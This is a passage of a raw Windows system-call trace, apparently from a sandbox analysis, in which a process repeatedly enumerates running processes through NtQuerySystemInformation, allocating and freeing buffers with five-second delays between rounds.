SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.546] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.645] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.666] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.726] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.751] 